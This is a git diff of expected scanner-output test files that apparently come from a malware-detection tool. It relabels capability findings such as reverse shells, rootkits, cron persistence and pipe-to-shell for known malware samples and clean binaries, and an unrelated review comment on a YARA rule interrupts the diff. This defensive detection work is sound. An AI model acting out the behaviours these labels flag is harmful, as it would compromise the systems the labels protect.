exec/program: medium diff --git a/tests/javascript/2022.an-instance.99.10.9/index.js.simple b/tests/javascript/2022.an-instance.99.10.9/index.js.simple index 3f22ff99b..75c6f215c 100644 --- a/tests/javascript/2022.an-instance.99.10.9/index.js.simple +++ b/tests/javascript/2022.an-instance.99.10.9/index.js.simple @@ -2,7 +2,7 @@ anti-static/obfuscation/hex: medium data/encoding/json_encode: low discover/network/interface_list: medium -discover/system/hostname_get: low +discover/system/hostname: low discover/user/info: medium exfil/nodejs: critical fs/directory/list: low diff --git a/tests/javascript/clean/203.b7219352.chunk.js.simple b/tests/javascript/clean/203.b7219352.chunk.js.simple index 0e5568b9b..68bb087d0 100644 --- a/tests/javascript/clean/203.b7219352.chunk.js.simple 
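Review bot: `description = "Glory to Ukraine!"` in rule `ukraine` is the slogan itself rather than a description of what the rule detects; `description = "contains a Russian-language pro-Ukraine slogan"` tells a reader what triggered and why it sits under `sus`. The string `"слава Украине!"` is matched case-sensitively, so the capitalised `Слава Украине!` and the Ukrainian-language `Слава Україні!` are not covered; adding them as further strings under the existing `any of them` is the straightforward fix. There is also no `filesize` bound and no `ref` explaining the indicator's origin.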
+++ b/tests/javascript/clean/203.b7219352.chunk.js.simple @@ -8,6 +8,7 @@ data/encoding/json_encode: low discover/network/interface_list: medium discover/network/mac_address: medium discover/network/netstat: medium +discover/system/dmesg: low discover/system/platform: low discover/user/HOME: low discover/user/USER: low diff --git a/tests/javascript/clean/5A50D54796BB27126E03A7E25DD5D589.cache.js.simple b/tests/javascript/clean/5A50D54796BB27126E03A7E25DD5D589.cache.js.simple index 2804b9123..0be4faad4 100644 --- a/tests/javascript/clean/5A50D54796BB27126E03A7E25DD5D589.cache.js.simple +++ b/tests/javascript/clean/5A50D54796BB27126E03A7E25DD5D589.cache.js.simple @@ -23,7 +23,7 @@ discover/group/lookup: medium discover/process/egid: medium discover/process/parent: low discover/processes/list: medium -discover/system/hostname_get: low +discover/system/hostname: low discover/system/platform: low discover/user/HOME: low discover/user/USER: low diff --git a/tests/javascript/clean/5D3EB8D016DDDA0665CB8CD8EEA6C537.cache.js.simple b/tests/javascript/clean/5D3EB8D016DDDA0665CB8CD8EEA6C537.cache.js.simple index 698e87467..be7062b83 100644 --- a/tests/javascript/clean/5D3EB8D016DDDA0665CB8CD8EEA6C537.cache.js.simple +++ b/tests/javascript/clean/5D3EB8D016DDDA0665CB8CD8EEA6C537.cache.js.simple @@ -25,7 +25,7 @@ discover/group/lookup: medium discover/process/egid: medium discover/process/parent: low discover/processes/list: medium -discover/system/hostname_get: low +discover/system/hostname: low discover/system/platform: low discover/user/HOME: low discover/user/USER: low diff --git a/tests/javascript/clean/bash.js.simple b/tests/javascript/clean/bash.js.simple index 13532d334..dbfc0600a 100644 --- a/tests/javascript/clean/bash.js.simple +++ b/tests/javascript/clean/bash.js.simple 
@@ -1,9 +1,10 @@ # javascript/clean/bash.js: medium data/compression/bzip2: low data/compression/gzip: low +discover/multiple: medium discover/network/interface_list: medium discover/network/netstat: medium -discover/system/network: medium +discover/system/dmesg: low discover/system/platform: low discover/user/name_get: medium evasion/bypass_security/linux/se: medium diff --git a/tests/javascript/clean/highlight.esm.js.simple b/tests/javascript/clean/highlight.esm.js.simple index 253491788..ad9968262 100644 --- a/tests/javascript/clean/highlight.esm.js.simple +++ b/tests/javascript/clean/highlight.esm.js.simple @@ -23,7 +23,7 @@ discover/user/name_get: low exec/cmd: medium exec/plugin: low exec/program/background: low -exec/program/hidden: low +exec/program/hidden: medium exec/remote_commands/code_eval: medium exec/script/osa: medium exec/shell/SHELL: low diff --git a/tests/javascript/clean/highlight.js.simple b/tests/javascript/clean/highlight.js.simple index 9e9e58262..1d6cc7135 100644 --- a/tests/javascript/clean/highlight.js.simple +++ b/tests/javascript/clean/highlight.js.simple @@ -23,7 +23,7 @@ discover/user/name_get: low exec/cmd: medium exec/plugin: low exec/program/background: low -exec/program/hidden: low +exec/program/hidden: medium exec/remote_commands/code_eval: medium exec/script/osa: medium exec/shell/SHELL: low diff --git a/tests/javascript/clean/mode-php.js.simple b/tests/javascript/clean/mode-php.js.simple index 11134aafd..98840f39b 100644 --- a/tests/javascript/clean/mode-php.js.simple +++ b/tests/javascript/clean/mode-php.js.simple @@ -13,7 +13,7 @@ data/hash/md5: low data/random/insecure: low discover/process/egid: medium discover/process/parent: low -discover/system/hostname_get: low +discover/system/hostname: low discover/system/platform: low discover/user/USER: low discover/user/name_get: low 
diff --git a/tests/javascript/clean/mode-php_laravel_blade.js.simple b/tests/javascript/clean/mode-php_laravel_blade.js.simple index 095b10183..a5f1f66b8 100644 --- a/tests/javascript/clean/mode-php_laravel_blade.js.simple +++ b/tests/javascript/clean/mode-php_laravel_blade.js.simple @@ -13,7 +13,7 @@ data/hash/md5: low data/random/insecure: low discover/process/egid: medium discover/process/parent: low -discover/system/hostname_get: low +discover/system/hostname: low discover/system/platform: low discover/user/USER: low discover/user/name_get: low diff --git a/tests/javascript/clean/php.js.simple b/tests/javascript/clean/php.js.simple index 0b5239bd7..57a0b5396 100644 --- a/tests/javascript/clean/php.js.simple +++ b/tests/javascript/clean/php.js.simple @@ -11,7 +11,7 @@ data/encoding/reverse: low data/random/insecure: low discover/process/egid: medium discover/process/parent: low -discover/system/hostname_get: low +discover/system/hostname: low discover/system/platform: low discover/user/USER: low discover/user/name_get: low diff --git a/tests/javascript/clean/prism-bash.js.simple b/tests/javascript/clean/prism-bash.js.simple index 4a9c7f0a8..22517e6cc 100644 --- a/tests/javascript/clean/prism-bash.js.simple +++ b/tests/javascript/clean/prism-bash.js.simple @@ -1,9 +1,10 @@ # javascript/clean/prism-bash.js: medium data/compression/bzip2: low data/compression/gzip: low +discover/multiple: medium discover/network/interface_list: medium discover/network/netstat: medium -discover/system/network: medium +discover/system/dmesg: low discover/system/platform: low discover/user/name_get: medium evasion/bypass_security/linux/se: medium diff --git a/tests/javascript/clean/prism-bash.min.js.simple b/tests/javascript/clean/prism-bash.min.js.simple index b20adfcd2..7849e6737 100644 --- a/tests/javascript/clean/prism-bash.min.js.simple +++ b/tests/javascript/clean/prism-bash.min.js.simple 
@@ -1,9 +1,10 @@ # javascript/clean/prism-bash.min.js: medium data/compression/bzip2: low data/compression/gzip: low +discover/multiple: medium discover/network/interface_list: medium discover/network/netstat: medium -discover/system/network: medium +discover/system/dmesg: low discover/system/platform: low discover/user/name_get: medium evasion/bypass_security/linux/se: medium diff --git a/tests/javascript/clean/scripts.c88fecd373e21509.js.simple b/tests/javascript/clean/scripts.c88fecd373e21509.js.simple index 3c0d0badc..724f70e98 100644 --- a/tests/javascript/clean/scripts.c88fecd373e21509.js.simple +++ b/tests/javascript/clean/scripts.c88fecd373e21509.js.simple @@ -4,9 +4,10 @@ data/compression/bzip2: low data/compression/gzip: low data/encoding/json_decode: low data/encoding/json_encode: low +discover/multiple: medium discover/network/interface_list: medium discover/network/netstat: medium -discover/system/network: medium +discover/system/dmesg: low discover/system/platform: low discover/user/name_get: medium evasion/bypass_security/linux/se: medium diff --git a/tests/linux/2021.FontOnLake/45E9.elf.simple b/tests/linux/2021.FontOnLake/45E9.elf.simple index c637f8aae..78b178759 100644 --- a/tests/linux/2021.FontOnLake/45E9.elf.simple +++ b/tests/linux/2021.FontOnLake/45E9.elf.simple @@ -11,7 +11,8 @@ crypto/aes: low data/encoding/base64: low data/hash/md5: low discover/group/lookup: medium -discover/system/hostname_get: low +discover/system/dmesg: low +discover/system/hostname: low discover/user/HOME: low discover/user/USER: low evasion/bypass_security/linux/pam: medium @@ -20,6 +21,7 @@ evasion/file/location/x11_unix: low evasion/file/prefix: medium evasion/file/prefix/proc: high evasion/logging/acct: low +evasion/logging/dmesg: critical evasion/logging/failed_logins: medium evasion/logging/historical_logins: medium evasion/rootkit/refs: high 
@@ -58,7 +60,7 @@ fs/symlink_resolve: low fs/tempdir/create: low fs/tempdir/tempfile_create: low impact/remote_access/agent: medium -impact/remote_access/backdoor: high +impact/remote_access/backdoor: medium impact/remote_access/reverse_shell: medium impact/remote_access/ssh: high impact/rootkit: critical @@ -80,9 +82,9 @@ net/tcp/ssh: medium net/tun_tap: medium net/url/embedded: low persist/daemon: medium +persist/kernel_module/insert: high persist/kernel_module/kprobe: medium persist/kernel_module/module: medium -persist/kernel_module/module_load: medium persist/kernel_module/symbol_lookup: high persist/pid_file: medium process/chroot: low @@ -93,4 +95,3 @@ process/name_set: medium process/userid_set: low process/username_set: medium sus/ancient_gcc: medium -sus/malicious: medium diff --git a/tests/linux/2021.XMR-Stak/1b1a56.elf.simple b/tests/linux/2021.XMR-Stak/1b1a56.elf.simple index 0bc855b82..d33af9524 100644 --- a/tests/linux/2021.XMR-Stak/1b1a56.elf.simple +++ b/tests/linux/2021.XMR-Stak/1b1a56.elf.simple @@ -14,9 +14,9 @@ data/encoding/base64: low data/hash/blake2b: low data/hash/sha1: low data/random/insecure: low -discover/network/interface_get: low +discover/network/interface: low discover/process/runtime_deps: medium -discover/system/cpu_info: low +discover/system/cpu: low discover/system/platform: low discover/system/sysinfo: medium discover/user/HOME: low diff --git a/tests/linux/2022.Symbiote/kerneldev.so.bkp.simple b/tests/linux/2022.Symbiote/kerneldev.so.bkp.simple index 4448d98a5..0184dfa7d 100644 --- a/tests/linux/2022.Symbiote/kerneldev.so.bkp.simple +++ b/tests/linux/2022.Symbiote/kerneldev.so.bkp.simple @@ -6,7 +6,7 @@ credential/keylogger: medium credential/password: low discover/network/interface_list: medium discover/system/platform: low -evasion/rootkit/linux_userspace: critical +evasion/rootkit/userspace: critical exec/dylib/symbol_address: medium exfil/stealer/pam: high fs/link_read: low 
diff --git a/tests/linux/2022.ez-pwnkit/payload.simple b/tests/linux/2022.ez-pwnkit/payload.simple index 944a8619e..c1c01e83a 100644 --- a/tests/linux/2022.ez-pwnkit/payload.simple +++ b/tests/linux/2022.ez-pwnkit/payload.simple @@ -1,7 +1,7 @@ # linux/2022.ez-pwnkit/payload: critical c2/addr/ip: medium -discover/system/cpu_info: low -discover/system/hostname_get: low +discover/system/cpu: low +discover/system/hostname: low discover/system/platform: low exec/plugin: low exec/program: medium diff --git a/tests/linux/2023.FreeDownloadManager/freedownloadmanager.sdiff b/tests/linux/2023.FreeDownloadManager/freedownloadmanager.sdiff index 6f4d79d1c..cf673d234 100644 --- a/tests/linux/2023.FreeDownloadManager/freedownloadmanager.sdiff +++ b/tests/linux/2023.FreeDownloadManager/freedownloadmanager.sdiff @@ -11,6 +11,7 @@ +anti-static/base64/exec +anti-static/base64/http_agent +data/base64/external ++data/embedded/base64_elf +data/embedded/base64_terms +data/embedded/base64_url +data/embedded/pgp_key @@ -28,7 +29,9 @@ +fs/path/usr_bin +fs/path/var +fs/permission/modify ++impact/remote_access/botnet +net/download +net/url/embedded -+persist/cron/echo_tab ++persist/cron/etc_d +persist/cron/tab ++sus/geopolitics diff --git a/tests/linux/2023.Kinsing/install.sh.simple b/tests/linux/2023.Kinsing/install.sh.simple index 1d1bb23b2..37a0c28f7 100644 --- a/tests/linux/2023.Kinsing/install.sh.simple +++ b/tests/linux/2023.Kinsing/install.sh.simple @@ -65,6 +65,7 @@ impact/remote_access/kill_rm: medium net/download: medium net/download/fetch: high net/url/embedded: low +persist/cron/etc_d: high persist/cron/tab: medium persist/daemon: medium persist/linux_multi: high diff --git a/tests/linux/2024.Kaiji/eight-nebraska-autumn-illinois.simple b/tests/linux/2024.Kaiji/eight-nebraska-autumn-illinois.simple index 71b80807d..a301fce64 100644 --- a/tests/linux/2024.Kaiji/eight-nebraska-autumn-illinois.simple +++ b/tests/linux/2024.Kaiji/eight-nebraska-autumn-illinois.simple 
@@ -16,8 +16,8 @@ data/compression/gzip: low
 data/encoding/base64: low
 data/hash/md5: low
 discover/network/netstat: medium
-discover/system/cpu_info: low
-discover/system/hostname_get: low
+discover/system/cpu: low
+discover/system/hostname: low
 discover/system/platform: low
 evasion/bypass_security/linux/se: medium
 evasion/bypass_security/linux/se_disable: high
@@ -88,8 +88,6 @@ net/url/parse: low
 net/url/request: medium
 os/fd/sendfile: low
 os/kernel/netlink: low
-persist/cron/echo_tab: high
-persist/cron/hidden_tab: critical
-persist/cron/tab: medium
+persist/cron/tab: critical
 persist/daemon: medium
 process/groups_set: low
diff --git a/tests/linux/2024.TellYouThePass/uranus-ack-mike-cat.simple b/tests/linux/2024.TellYouThePass/uranus-ack-mike-cat.simple
index 27c58ccb8..3152b473a 100644
--- a/tests/linux/2024.TellYouThePass/uranus-ack-mike-cat.simple
+++ b/tests/linux/2024.TellYouThePass/uranus-ack-mike-cat.simple
@@ -14,8 +14,8 @@ data/encoding/base64: low
 data/encoding/json: low
 data/encoding/json_decode: low
 data/hash/md5: low
-discover/system/cpu_info: low
-discover/system/hostname_get: low
+discover/system/cpu: low
+discover/system/hostname: low
 discover/system/platform: low
 discover/user/HOME: low
 discover/user/USER: low
diff --git a/tests/linux/2024.chisel/crondx.simple b/tests/linux/2024.chisel/crondx.simple
index 3c58b6b40..3afefaff8 100644
--- a/tests/linux/2024.chisel/crondx.simple
+++ b/tests/linux/2024.chisel/crondx.simple
@@ -13,8 +13,8 @@ data/compression/gzip: low
 data/encoding/base64: low
 data/encoding/json: low
 data/hash/md5: low
-discover/system/cpu_info: low
-discover/system/hostname_get: low
+discover/system/cpu: low
+discover/system/hostname: low
 discover/system/platform: low
 exec/plugin: low
 exec/program: medium
diff --git a/tests/linux/2024.clobber_xmrig/cba8d79949adc3c56c02fee56644f4084b7471bc5aed1c81803054f017240a72.simple b/tests/linux/2024.clobber_xmrig/cba8d79949adc3c56c02fee56644f4084b7471bc5aed1c81803054f017240a72.simple
index a6f56798e..4210546ff 100644
--- a/tests/linux/2024.clobber_xmrig/cba8d79949adc3c56c02fee56644f4084b7471bc5aed1c81803054f017240a72.simple
+++ b/tests/linux/2024.clobber_xmrig/cba8d79949adc3c56c02fee56644f4084b7471bc5aed1c81803054f017240a72.simple
@@ -21,8 +21,8 @@ data/encoding/json_decode: low
 data/hash/md5: low
 discover/ip/public: high
 discover/processes/list: medium
-discover/system/cpu_info: low
-discover/system/hostname_get: low
+discover/system/cpu: low
+discover/system/hostname: low
 discover/user/HOME: low
 evasion/bypass_security/linux/pam: medium
 evasion/file/prefix: medium
diff --git a/tests/linux/2024.gas/gas.simple b/tests/linux/2024.gas/gas.simple
index 695a98f23..599e81b10 100644
--- a/tests/linux/2024.gas/gas.simple
+++ b/tests/linux/2024.gas/gas.simple
@@ -1,8 +1,8 @@
 # linux/2024.gas/gas: high
 anti-behavior/LD_DEBUG: medium
 anti-behavior/LD_PROFILE: medium
-discover/system/cpu_info: low
-discover/system/dev_full: medium
+discover/system/cpu: low
+discover/system/dev_full: low
 discover/system/platform: low
 discover/system/sysinfo: medium
 evasion/hijack_execution/LD_LIBRARY_PATH: low
diff --git a/tests/linux/2024.kworker_pretenders/emp3r0r.agent.simple b/tests/linux/2024.kworker_pretenders/emp3r0r.agent.simple
index bd35f027d..f7983ea6d 100644
--- a/tests/linux/2024.kworker_pretenders/emp3r0r.agent.simple
+++ b/tests/linux/2024.kworker_pretenders/emp3r0r.agent.simple
@@ -31,10 +31,11 @@ data/encoding/json_decode: low
 data/hash/blake2b: low
 data/hash/md5: low
 data/hash/sha256: low
+discover/network/connectivity: low
 discover/network/netstat: medium
 discover/processes/list: medium
-discover/system/cpu_info: low
-discover/system/hostname_get: low
+discover/system/cpu: low
+discover/system/hostname: low
 discover/system/platform: low
 discover/system/sysinfo: medium
 discover/user/HOME: low
@@ -124,7 +125,6 @@ net/ip/host_port: medium
 net/ip/icmp: medium
 net/ip/multicast_send: low
 net/ip/parse: medium
-net/ip/spoof: medium
 net/ip/tcp_state_tracker: medium
 net/proxy/shadowsocks: high
 net/proxy/socks5: medium
diff --git a/tests/linux/2024.kworker_pretenders/gafgyt.simple b/tests/linux/2024.kworker_pretenders/gafgyt.simple
index 3cbd303b1..709a44a35 100644
--- a/tests/linux/2024.kworker_pretenders/gafgyt.simple
+++ b/tests/linux/2024.kworker_pretenders/gafgyt.simple
@@ -6,6 +6,7 @@ credential/ssh/d: medium
 data/base64/external: medium
 data/encoding/base64: low
 evasion/file/location/dev_shm: medium
+evasion/file/location/multiple: high
 evasion/file/location/var_run: medium
 evasion/file/location/var_tmp: medium
 evasion/mimicry/fake_process: critical
@@ -26,6 +27,7 @@ fs/proc/self_exe: medium
 net/dns/servers: low
 net/http/request: low
 net/socket/send: low
+persist/cron/etc_d: high
 persist/cron/tab: medium
 persist/daemon: medium
 process/executable_path: low
diff --git a/tests/linux/2024.medusa/rkload.simple b/tests/linux/2024.medusa/rkload.simple
index bac6337eb..af8c2f55f 100644
--- a/tests/linux/2024.medusa/rkload.simple
+++ b/tests/linux/2024.medusa/rkload.simple
@@ -4,8 +4,8 @@ anti-behavior/LD_DEBUG: medium
 anti-behavior/LD_PROFILE: medium
 anti-static/xor/commands: high
 credential/ssh/d: medium
-discover/system/cpu_info: low
-discover/system/dev_full: medium
+discover/system/cpu: low
+discover/system/dev_full: low
 discover/system/sysinfo: medium
 evasion/file/location/dev_shm: high
 evasion/file/location/lib: high
@@ -15,7 +15,7 @@ evasion/file/prefix/dev: critical
 evasion/file/prefix/lib: high
 evasion/hijack_execution/LD_LIBRARY_PATH: low
 evasion/hijack_execution/etc_ld.so.preload: medium
-evasion/rootkit/linux_userspace: critical
+evasion/rootkit/userspace: critical
 exec/conditional/LANG: low
 exec/dylib/address_check: low
 exec/dylib/symbol_address: medium
diff --git a/tests/linux/clean/appsec-rules.json.simple b/tests/linux/clean/appsec-rules.json.simple
index 08541cf86..4a34603df 100644
--- a/tests/linux/clean/appsec-rules.json.simple
+++ b/tests/linux/clean/appsec-rules.json.simple
@@ -19,7 +19,8 @@ data/compression/bzip2: low
 data/compression/lzma: low
 data/compression/zstd: low
 data/encoding/base64: low
-discover/system/network: medium
+discover/multiple: medium
+discover/system/dmesg: low
 discover/system/platform: low
 discover/user/name_get: medium
 evasion/bypass_security/linux/iptables: medium
diff --git a/tests/linux/clean/busybox.simple b/tests/linux/clean/busybox.simple
index 37746918e..d289770c8 100644
--- a/tests/linux/clean/busybox.simple
+++ b/tests/linux/clean/busybox.simple
@@ -8,11 +8,12 @@ data/compression/lzma: low
 data/encoding/base64: low
 data/random/insecure: low
 discover/group/lookup: medium
-discover/network/interface_get: low
+discover/network/interface: low
 discover/network/netstat: medium
 discover/process/parent: low
 discover/processes/pgrep: medium
-discover/system/cpu_info: low
+discover/system/cpu: low
+discover/system/dmesg: low
 discover/system/platform: low
 discover/system/sysinfo: medium
 discover/user/HOME: low
diff --git a/tests/linux/clean/caddy.simple b/tests/linux/clean/caddy.simple
index 15ad1c190..fa1845840 100644
--- a/tests/linux/clean/caddy.simple
+++ b/tests/linux/clean/caddy.simple
@@ -39,8 +39,8 @@ discover/cloud/google_metadata: low
 discover/group/lookup: medium
 discover/network/mac_address: medium
 discover/process/parent: low
-discover/system/cpu_info: low
-discover/system/hostname_get: low
+discover/system/cpu: low
+discover/system/hostname: low
 discover/system/platform: medium
 discover/user/HOME: low
 discover/user/USER: low
diff --git a/tests/linux/clean/chezmoi.simple b/tests/linux/clean/chezmoi.simple
index 25f8dd578..97c25b8fa 100644
--- a/tests/linux/clean/chezmoi.simple
+++ b/tests/linux/clean/chezmoi.simple
@@ -47,8 +47,8 @@ data/random/insecure: low
 discover/group/lookup: medium
 discover/network/mac_address: medium
 discover/process/parent: low
-discover/system/cpu_info: low
-discover/system/hostname_get: low
+discover/system/cpu: low
+discover/system/hostname: low
 discover/system/platform: low
 discover/system/sysinfo: medium
 discover/user/HOME: low
diff --git a/tests/linux/clean/chrome.simple b/tests/linux/clean/chrome.simple
index f6058f27e..4dbc704d1 100644
--- a/tests/linux/clean/chrome.simple
+++ b/tests/linux/clean/chrome.simple
@@ -42,7 +42,7 @@ discover/process/name: medium
 discover/process/parent: low
 discover/process/runtime_deps: medium
 discover/processes/list: medium
-discover/system/hostname_get: low
+discover/system/hostname: low
 discover/system/platform: low
 discover/system/sysinfo: medium
 discover/user/HOME: low
diff --git a/tests/linux/clean/clickhouse.simple b/tests/linux/clean/clickhouse.simple
index f2ee677c1..bd77a7ee6 100644
--- a/tests/linux/clean/clickhouse.simple
+++ b/tests/linux/clean/clickhouse.simple
@@ -42,14 +42,15 @@ data/hash/sha256: low
 data/hash/whirlpool: medium
 data/random/insecure: low
 discover/cloud/google_metadata: low
-discover/network/interface_get: low
+discover/network/interface: low
 discover/network/interface_list: medium
 discover/permissions/capabilities: medium
 discover/process/name: medium
 discover/process/runtime_deps: medium
 discover/processes/list: medium
-discover/system/cpu_info: low
-discover/system/hostname_get: low
+discover/system/cpu: low
+discover/system/dmesg: low
+discover/system/hostname: low
 discover/system/platform: low
 discover/user/HOME: low
 discover/user/USER: low
@@ -70,7 +71,7 @@ exec/install_additional/package_install: medium
 exec/plugin: low
 exec/program: medium
 exec/program/background: low
-exec/program/hidden: low
+exec/program/hidden: medium
 exec/shell/SHELL: low
 exec/shell/TERM: low
 exec/shell/background_sleep: medium
diff --git a/tests/linux/clean/code-oss.md b/tests/linux/clean/code-oss.md
index 7ca00157c..8b39a12e5 100644
--- a/tests/linux/clean/code-oss.md
+++ b/tests/linux/clean/code-oss.md
@@ -2,7 +2,7 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |--------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| HIGH | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_php_url_with_question) | contains hardcoded endpoint with a question mark | [http://autocomplete.nigma.ru/complete/query_help.php?suggest=true&q=](http://autocomplete.nigma.ru/complete/query_help.php?suggest=true&q=)
[http://search.incredibar.com/search.php?q=](http://search.incredibar.com/search.php?q=)
[http://searchfunmoods.com/results.php?q=](http://searchfunmoods.com/results.php?q=)
[https://m.so.com/index.php?ie=](https://m.so.com/index.php?ie=)
[https://search.privacywall.org/suggest.php?q=](https://search.privacywall.org/suggest.php?q=) | +| HIGH | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_url_with_question) | binary contains hardcoded URL with question mark | [http://autocomplete.nigma.ru/complete/query_help.php?suggest=true&q=](http://autocomplete.nigma.ru/complete/query_help.php?suggest=true&q=)
[http://search.incredibar.com/search.php?q=](http://search.incredibar.com/search.php?q=)
[http://search.sweetim.com/search.asp?q=](http://search.sweetim.com/search.asp?q=)
[http://searchfunmoods.com/results.php?q=](http://searchfunmoods.com/results.php?q=)
[http://start.sweetpacks.com/search.asp?q=](http://start.sweetpacks.com/search.asp?q=)
[https://m.so.com/index.php?ie=](https://m.so.com/index.php?ie=)
[https://search.privacywall.org/suggest.php?q=](https://search.privacywall.org/suggest.php?q=) | | MEDIUM | [3P/threat_hunting/google_remote_desktop](https://github.com/chainguard-dev/malcontent/blob/main/rules/yara/threat_hunting/all.yara#Google_Remote_Desktop_greyware_tool_keyword) | [references 'Google Remote Desktop' tool](https://github.com/mthcht/ThreatHunting-Keywords), by mthcht | [inomeogfingihgjfjlpeplalcfajhgai](https://github.com/search?q=inomeogfingihgjfjlpeplalcfajhgai&type=code) | | MEDIUM | [3P/threat_hunting/proxmark](https://github.com/chainguard-dev/malcontent/blob/main/rules/yara/threat_hunting/all.yara#Proxmark_offensive_tool_keyword) | [references 'Proxmark' tool](https://github.com/mthcht/ThreatHunting-Keywords), by mthcht | [ProxMark](https://github.com/search?q=ProxMark&type=code) | | MEDIUM | [anti-behavior/LD_DEBUG](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/LD_DEBUG.yara#env_LD_DEBUG) | Checks if dynamic linker debugging is enabled | [LD_DEBUG](https://github.com/search?q=LD_DEBUG&type=code) | @@ -35,6 +35,7 @@ | MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [ExecuteCommandLists](https://github.com/search?q=ExecuteCommandLists&type=code)
[_executeCommand](https://github.com/search?q=_executeCommand&type=code)
[execCommand](https://github.com/search?q=execCommand&type=code)
[vkCmdExecuteCommands](https://github.com/search?q=vkCmdExecuteCommands&type=code) | | MEDIUM | [exec/dylib/symbol_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/symbol-address.yara#dlsym) | [get the address of a symbol](https://man7.org/linux/man-pages/man3/dlsym.3.html) | [dlsym](https://github.com/search?q=dlsym&type=code) | | MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#execall) | executes external programs | [execvp](https://github.com/search?q=execvp&type=code) | +| MEDIUM | [exec/program/hidden](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/hidden.yara#relative_hidden_launcher) | relative hidden launcher | [./.691.9B](https://github.com/search?q=.%2F.691.9B&type=code)
[bash](https://github.com/search?q=bash&type=code)
[exec](https://github.com/search?q=exec&type=code)
[system](https://github.com/search?q=system&type=code) | | MEDIUM | [exec/shell/pipe_sh](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/pipe_sh.yara#pipe_to_shell) | pipes to shell | [| sh](https://github.com/search?q=%7C+sh&type=code) | | MEDIUM | [exec/tty/pathname](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/tty/pathname.yara#ttyname) | returns the pathname of a terminal device | [ttyname](https://github.com/search?q=ttyname&type=code) | | MEDIUM | [exfil/office_file_ext](https://github.com/chainguard-dev/malcontent/blob/main/rules/exfil/office_file_ext.yara#office_extensions) | References multiple Office file extensions (possible exfil) | [docx](https://github.com/search?q=docx&type=code)
[eml](https://github.com/search?q=eml&type=code)
[ppt](https://github.com/search?q=ppt&type=code)
[pst](https://github.com/search?q=pst&type=code)
[xlsx](https://github.com/search?q=xlsx&type=code) | @@ -103,9 +104,9 @@ | LOW | [data/encoding/json_encode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/json-encode.yara#JSONEncode) | encodes JSON | [JSON.stringify](https://github.com/search?q=JSON.stringify&type=code) | | LOW | [data/hash/sha1](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/sha1.yara#SHA1) | Uses the SHA1 signature format | [SHA1_](https://github.com/search?q=SHA1_&type=code) | | LOW | [data/random/insecure](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/random/insecure.yara#bsd_rand) | [generate random numbers insecurely](https://man.openbsd.org/rand) | [srand](https://github.com/search?q=srand&type=code) | -| LOW | [discover/network/interface_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface-get.yara#bsd_if) | get network interfaces by name or index | [if_indextoname](https://github.com/search?q=if_indextoname&type=code)
[if_nametoindex](https://github.com/search?q=if_nametoindex&type=code) | +| LOW | [discover/network/interface](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface.yara#bsd_if) | get network interfaces by name or index | [if_indextoname](https://github.com/search?q=if_indextoname&type=code)
